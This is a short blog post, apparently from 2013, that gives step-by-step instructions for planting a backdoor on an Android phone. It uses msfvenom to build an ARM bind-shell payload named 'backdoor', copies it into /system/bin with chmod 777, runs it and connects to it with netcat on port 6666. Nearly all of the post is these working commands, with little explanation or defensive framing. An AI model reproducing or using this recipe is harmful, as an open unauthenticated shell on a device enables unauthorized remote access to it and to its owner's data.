A simple android shell with Metasploit
msfvenom -p linux/armle/shell_bind_tcp -f elf LPORT=6666 > /tmp/backdoor
2) Mount your android /system/bin dir for r/w
I used “Root Explorer” app for this. There are other ways to do it.
3) Copy /tmp/backdoor (from Backtrack) to /system/bin/backdoor (your phone) and chmod 777
4) Run ‘backdoor’ on your phone. (Use a terminal emulator, or find any other way )
5) Connect to phone
nc your.phone.ip.address 6666
6) When connection is established, set PATH variable
He further says it still needs root permission plant this, and shell does not listen persistently, so when we disconnect, the file must be run again on the phone.
Source : corrupt.net
Latest posts by indiandragon (see all)
- Swiftkey vs Swiftkey Tablet review - May 25, 2013
- Google + Hangout app review, messaging kills online chat ! - May 21, 2013
- Best cyanogenmod supported phone under Rs10,000 or $180 - May 15, 2013